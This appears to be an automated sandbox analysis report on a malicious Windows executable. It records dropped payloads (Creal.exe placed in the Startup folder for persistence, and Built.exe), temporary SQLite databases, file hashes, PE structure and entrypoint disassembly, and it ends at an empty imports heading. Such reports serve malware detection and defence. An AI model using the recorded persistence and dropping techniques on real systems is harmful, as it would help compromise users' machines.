                                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Tempcrxgbqckbr.db

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Tempcryclhnght.db

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Tempcrytfipghb.db

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                      Entropy (8bit):0.8508558324143882
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:TLlF1kwNbXYFpFNYcw+6UwcQVXH5fBaJvWKC0ABndzGrW7swaE:TxFawNLopFgU10XJBaEKQxdgQsw
                                                                                                                                                                                                                                                      MD5:933D6D14518371B212F36C3835794D75
                                                                                                                                                                                                                                                      SHA1:92D056D912B3C0260D379330D3CC0359B57A322B
                                                                                                                                                                                                                                                      SHA-256:55390EE61FB85370A8A7F51A8DD5374F7B1801D1D7DF09D6A90CDD74ED6E7D1E
                                                                                                                                                                                                                                                      SHA-512:EAC706D8A579500EADA26FB9883E1F3CE9112A03F38EE78B11B393AB0A3285945F8E06EB406BFC17D1CB540F840E435E515FABFC265399CE6F5193980FDE3F2C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\Creal.exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16912015
                                                                                                                                                                                                                                                      Entropy (8bit):7.996822378035481
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:393216:29YiZM63hucsXMCHWUj/cuIbvR/PrK8Xms96YqZVo:29YiZt3hrsXMb8Ut/TKXlVo
                                                                                                                                                                                                                                                      MD5:017603B860F67F7F65F724E519465926
                                                                                                                                                                                                                                                      SHA1:51B1924EC73969FC16E00C0E80597C07711CF866
                                                                                                                                                                                                                                                      SHA-256:1BA7BEDAAA3A81350A78CF579E625E879D6D68CEF0F7AC8C55CC419798F380E1
                                                                                                                                                                                                                                                      SHA-512:A695347BEF5BDFDCD4ADEE43909B375828D89D48F78F88D443E4E19728FF82F2BFB5487EA80FBBBD9953394985BB0FDC935DA734EB32220FB386D701F9BC3945
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n=..*\.Z*\.Z*\.Za$.[-\.Za$.[.\.Za$.[ \.Z:..Z)\.Z:..[#\.Z:..[;\.Z:..[.\.Za$.[!\.Z*\.Z.\.Zb..[3\.Zb..[+\.ZRich*\.Z........PE..d...f%/g.........."....).....\.................@....................................r.....`.................................................\...x....p.......@..P"...........p..d...................................@...@............................................text............................... ..`.rdata..P*.......,..................@..@.data....S..........................@....pdata..P"...@...$..................@..@.rsrc........p......................@..@.reloc..d....p......................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\Desktop\Built.exe

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):7849062
                                                                                                                                                                                                                                                      Entropy (8bit):7.993164697244828
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:196608:yOgFHwfI9jUC2gYBYv3vbW5+iITm1U6fi:4FMIH2gYBgDW4TOz6
                                                                                                                                                                                                                                                      MD5:12E9F3CE18351EE539646C23CC862C5C
                                                                                                                                                                                                                                                      SHA1:0B2487FE4E3FFAF79FDF1C0C0B01F6CE68346DAF
                                                                                                                                                                                                                                                      SHA-256:72FDB72DCC71697B027824211E2879F4BF8C8974E56A857F2FCA30AD7B675D6F
                                                                                                                                                                                                                                                      SHA-512:585882CBB5E8097D47B3985326A4AE9C17D2E015801652D88A5C5230FEAB1ADD48F60BD73FA9FF34B505DE742B437E53ED03B53D5011C1834C134610FF96AC59
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n=..*\.Z*\.Z*\.Za$.[-\.Za$.[.\.Za$.[ \.Z:..Z)\.Z:..[#\.Z:..[;\.Z:..[.\.Za$.[!\.Z*\.Z.\.Zb..[3\.Zb..[+\.ZRich*\.Z........PE..d....-/g.........."....).....p.................@......................................x...`.................................................\...x....p.......@..P"....w..'......d...................................@...@............................................text............................... ..`.rdata..P*.......,..................@..@.data....S..........................@....pdata..P"...@...$..................@..@.rsrc........p......................@..@.reloc..d...........................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      C:\Users\user\Desktop\Creal.exe

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe
                                                                                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16912015
                                                                                                                                                                                                                                                      Entropy (8bit):7.996822378035481
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:393216:29YiZM63hucsXMCHWUj/cuIbvR/PrK8Xms96YqZVo:29YiZt3hrsXMb8Ut/TKXlVo
                                                                                                                                                                                                                                                      MD5:017603B860F67F7F65F724E519465926
                                                                                                                                                                                                                                                      SHA1:51B1924EC73969FC16E00C0E80597C07711CF866
                                                                                                                                                                                                                                                      SHA-256:1BA7BEDAAA3A81350A78CF579E625E879D6D68CEF0F7AC8C55CC419798F380E1
                                                                                                                                                                                                                                                      SHA-512:A695347BEF5BDFDCD4ADEE43909B375828D89D48F78F88D443E4E19728FF82F2BFB5487EA80FBBBD9953394985BB0FDC935DA734EB32220FB386D701F9BC3945
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n=..*\.Z*\.Z*\.Za$.[-\.Za$.[.\.Za$.[ \.Z:..Z)\.Z:..[#\.Z:..[;\.Z:..[.\.Za$.[!\.Z*\.Z.\.Zb..[3\.Zb..[+\.ZRich*\.Z........PE..d...f%/g.........."....).....\.................@....................................r.....`.................................................\...x....p.......@..P"...........p..d...................................@...@............................................text............................... ..`.rdata..P*.......,..................@..@.data....S..........................@....pdata..P"...@...$..................@..@.rsrc........p......................@..@.reloc..d....p......................@..B........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                      \Device\ConDrv

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):97
                                                                                                                                                                                                                                                      Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                                                      MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                                                      SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                                                      SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                                                      SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..Service Version: 0.0.0.0..user Version: 0.0.0.0....No user/signature is currently loaded...

                                                                                                                                                                                                                                                      Static File Info

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                      Entropy (8bit):7.998309569463509
                                                                                                                                                                                                                                                      TrID:
                                                                                                                                                                                                                                                      • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                                      • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                                      • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                      File name:#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe
                                                                                                                                                                                                                                                      File size:24'810'296 bytes
                                                                                                                                                                                                                                                      MD5:3ac5f99224a92851c80fe4178fff6002
                                                                                                                                                                                                                                                      SHA1:20eae332be7470533009e2a0f28412463acb1f06
                                                                                                                                                                                                                                                      SHA256:a21cd46fbedb13199e3675a4ee14af9914547d237342fca0c8cd8022a7888363
                                                                                                                                                                                                                                                      SHA512:273ac0822ed0aae191333df6ebfca136e7dd87a910b11343fffefd96b37f2f4d25824a1e5f7708e01bf8bd19466b9a0bab2437b21a672e2e846ad6c3e6b3dcab
                                                                                                                                                                                                                                                      SSDEEP:393216:oAZ/msYXMrZme4GaBWbBFcCdq1auXYKKJo1/uG8IQKqSgjqgeMW5+74:oAZ/mlXKZmWaYFqoBo1uG8N/jReMD4
                                                                                                                                                                                                                                                      TLSH:28473348EB9508EDC2BBD5349DC71712E6767C161731DA6B62E903262E6F2B0CC7A313
                                                                                                                                                                                                                                                      File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........B#..,p..,p..,p.:.p..,p.:.p5.,p.:.p..,p<..p..,p<.(q..,p<./q..,p<.)q..,p...p..,p...p..,p...p..,p..-p..,p2.)q..,p2.,q..,p2..p..,

                                                                                                                                                                                                                                                      File Icon

                                                                                                                                                                                                                                                      Icon Hash:1515d4d4442f2d2d

                                                                                                                                                                                                                                                      Static PE Info

                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                      Entrypoint:0x1400266b0
                                                                                                                                                                                                                                                      Entrypoint Section:.text
                                                                                                                                                                                                                                                      Digitally signed:false
                                                                                                                                                                                                                                                      Imagebase:0x140000000
                                                                                                                                                                                                                                                      Subsystem:windows gui
                                                                                                                                                                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                      Time Stamp:0x6640972B [Sun May 12 10:17:15 2024 UTC]
                                                                                                                                                                                                                                                      TLS Callbacks:
                                                                                                                                                                                                                                                      CLR (.Net) Version:
                                                                                                                                                                                                                                                      OS Version Major:5
                                                                                                                                                                                                                                                      OS Version Minor:2
                                                                                                                                                                                                                                                      File Version Major:5
                                                                                                                                                                                                                                                      File Version Minor:2
                                                                                                                                                                                                                                                      Subsystem Version Major:5
                                                                                                                                                                                                                                                      Subsystem Version Minor:2
                                                                                                                                                                                                                                                      Import Hash:e8a30656287fe831c9782204ed10cd68

                                                                                                                                                                                                                                                      Entrypoint Preview

                                                                                                                                                                                                                                                      Instruction
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      sub esp, 28h
                                                                                                                                                                                                                                                      call 00007F724CC47EB8h
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      add esp, 28h
                                                                                                                                                                                                                                                      jmp 00007F724CC4784Fh
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      mov eax, esp
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      mov dword ptr [eax+08h], ebx
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      mov dword ptr [eax+10h], ebp
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      mov dword ptr [eax+18h], esi
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      mov dword ptr [eax+20h], edi
                                                                                                                                                                                                                                                      inc ecx
                                                                                                                                                                                                                                                      push esi
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      sub esp, 20h
                                                                                                                                                                                                                                                      dec ebp
                                                                                                                                                                                                                                                      mov edx, dword ptr [ecx+38h]
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      mov esi, edx
                                                                                                                                                                                                                                                      dec ebp
                                                                                                                                                                                                                                                      mov esi, eax
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      mov ebp, ecx
                                                                                                                                                                                                                                                      dec ecx
                                                                                                                                                                                                                                                      mov edx, ecx
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      mov ecx, esi
                                                                                                                                                                                                                                                      dec ecx
                                                                                                                                                                                                                                                      mov edi, ecx
                                                                                                                                                                                                                                                      inc ecx
                                                                                                                                                                                                                                                      mov ebx, dword ptr [edx]
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      shl ebx, 04h
                                                                                                                                                                                                                                                      dec ecx
                                                                                                                                                                                                                                                      add ebx, edx
                                                                                                                                                                                                                                                      dec esp
                                                                                                                                                                                                                                                      lea eax, dword ptr [ebx+04h]
                                                                                                                                                                                                                                                      call 00007F724CC46E13h
                                                                                                                                                                                                                                                      mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                      and al, 66h
                                                                                                                                                                                                                                                      neg al
                                                                                                                                                                                                                                                      mov eax, 00000001h
                                                                                                                                                                                                                                                      sbb edx, edx
                                                                                                                                                                                                                                                      neg edx
                                                                                                                                                                                                                                                      add edx, eax
                                                                                                                                                                                                                                                      test dword ptr [ebx+04h], edx
                                                                                                                                                                                                                                                      je 00007F724CC479E3h
                                                                                                                                                                                                                                                      dec esp
                                                                                                                                                                                                                                                      mov ecx, edi
                                                                                                                                                                                                                                                      dec ebp
                                                                                                                                                                                                                                                      mov eax, esi
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      mov edx, esi
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      mov ecx, ebp
                                                                                                                                                                                                                                                      call 00007F724CC496A3h
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      mov ebx, dword ptr [esp+30h]
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      mov ebp, dword ptr [esp+38h]
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      mov esi, dword ptr [esp+40h]
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      mov edi, dword ptr [esp+48h]
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      add esp, 20h
                                                                                                                                                                                                                                                      inc ecx
                                                                                                                                                                                                                                                      pop esi
                                                                                                                                                                                                                                                      ret
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      sub esp, 48h
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      lea ecx, dword ptr [esp+20h]
                                                                                                                                                                                                                                                      call 00007F724CC468E3h
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      lea edx, dword ptr [00023B67h]
                                                                                                                                                                                                                                                      dec eax
                                                                                                                                                                                                                                                      lea ecx, dword ptr [esp+20h]
                                                                                                                                                                                                                                                      call 00007F724CC48AB2h
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      jmp 00007F724CC4E880h
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3
                                                                                                                                                                                                                                                      int3

                                                                                                                                                                                                                                                      Rich Headers

                                                                                                                                                                                                                                                      Programming Language:
                                                                                                                                                                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                                                                                                      • [IMP] VS2008 SP1 build 30729

                                                                                                                                                                                                                                                      Data Directories

                                                                                                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x4b1e00x34.rdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x4b2140x50.rdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x710000xe3bc.rsrc
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x6c0000x2ab4.pdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x800000x938.reloc
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x460e00x54.rdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x461800x28.rdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3de100x140.rdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x3b0000x4a0.rdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x4a4ac0x100.rdata
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                                                                                                      Sections

                                                                                                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                      .text0x10000x398ce0x39a0043edabbddfa6948cff2e968fd336a07dFalse0.5457226138828634data6.465308419785883IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      .rdata0x3b0000x1118c0x1120053297ea4f69cf70feab0538ecef732e2False0.44722285583941607data5.215657068009717IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      .data0x4d0000x1ef5c0x1a0008eb45cbc6a0e70bd1c0a96a66c4a6d0False0.2765925480769231DOS executable (block device driver o\3050)3.1766622656728773IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                      .pdata0x6c0000x2ab40x2c00703496d6ceba70b1fe234ccc9c454141False0.4807350852272727data5.409685184469512IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      .didat0x6f0000x3080x400c445681068e68e0f8df59c5ea517c5e5False0.2421875data2.786346435110699IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                      _RDATA0x700000x15c0x200b999e3f72a9a42ebb4d9b8fafa0a18e7False0.40625data3.3314534700182197IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      .rsrc0x710000xe3bc0xe40002cfe737f5942f05968796f88e24ed4bFalse0.6334292763157895data6.77846206625868IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                      .reloc0x800000x9380xa00c057cd0b29d094da3cebf433be170d6dFalse0.498828125data5.228587706357198IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                                                                                                      Resources

                                                                                                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                      PNG0x716740xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced1.0027729636048528
                                                                                                                                                                                                                                                      PNG0x721bc0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced0.9363390441839495
                                                                                                                                                                                                                                                      RT_ICON0x737680x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors0.47832369942196534
                                                                                                                                                                                                                                                      RT_ICON0x73cd00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors0.5410649819494585
                                                                                                                                                                                                                                                      RT_ICON0x745780xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors0.4933368869936034
                                                                                                                                                                                                                                                      RT_ICON0x754200x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m0.5390070921985816
                                                                                                                                                                                                                                                      RT_ICON0x758880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m0.41393058161350843
                                                                                                                                                                                                                                                      RT_ICON0x769300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m0.3479253112033195
                                                                                                                                                                                                                                                      RT_ICON0x78ed80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9809269502193401
                                                                                                                                                                                                                                                      RT_DIALOG0x7cc4c0x2badata0.5286532951289399
                                                                                                                                                                                                                                                      RT_DIALOG0x7cf080x13adata0.6560509554140127
                                                                                                                                                                                                                                                      RT_DIALOG0x7d0440xf2data0.71900826446281
                                                                                                                                                                                                                                                      RT_DIALOG0x7d1380x14adata0.6
                                                                                                                                                                                                                                                      RT_DIALOG0x7d2840x314data0.47588832487309646
                                                                                                                                                                                                                                                      RT_DIALOG0x7d5980x24adata0.6279863481228669
                                                                                                                                                                                                                                                      RT_STRING0x7d7e40x1fcdata0.421259842519685
                                                                                                                                                                                                                                                      RT_STRING0x7d9e00x246data0.41924398625429554
                                                                                                                                                                                                                                                      RT_STRING0x7dc280x1a6data0.514218009478673
                                                                                                                                                                                                                                                      RT_STRING0x7ddd00xdcdata0.65
                                                                                                                                                                                                                                                      RT_STRING0x7deac0x470data0.3873239436619718
                                                                                                                                                                                                                                                      RT_STRING0x7e31c0x164data0.5056179775280899
                                                                                                                                                                                                                                                      RT_STRING0x7e4800x110data0.5772058823529411
                                                                                                                                                                                                                                                      RT_STRING0x7e5900x158data0.4563953488372093
                                                                                                                                                                                                                                                      RT_STRING0x7e6e80xe8data0.5948275862068966
                                                                                                                                                                                                                                                      RT_STRING0x7e7d00x1c6data0.5242290748898678
                                                                                                                                                                                                                                                      RT_STRING0x7e9980x268data0.4837662337662338
                                                                                                                                                                                                                                                      RT_GROUP_ICON0x7ec000x68data0.7019230769230769
                                                                                                                                                                                                                                                      RT_MANIFEST0x7ec680x753XML 1.0 document, ASCII text, with CRLF line terminators0.3957333333333333

                                                                                                                                                                                                                                                      Imports

                                                                                                                                                                                                                                                      DLLImport
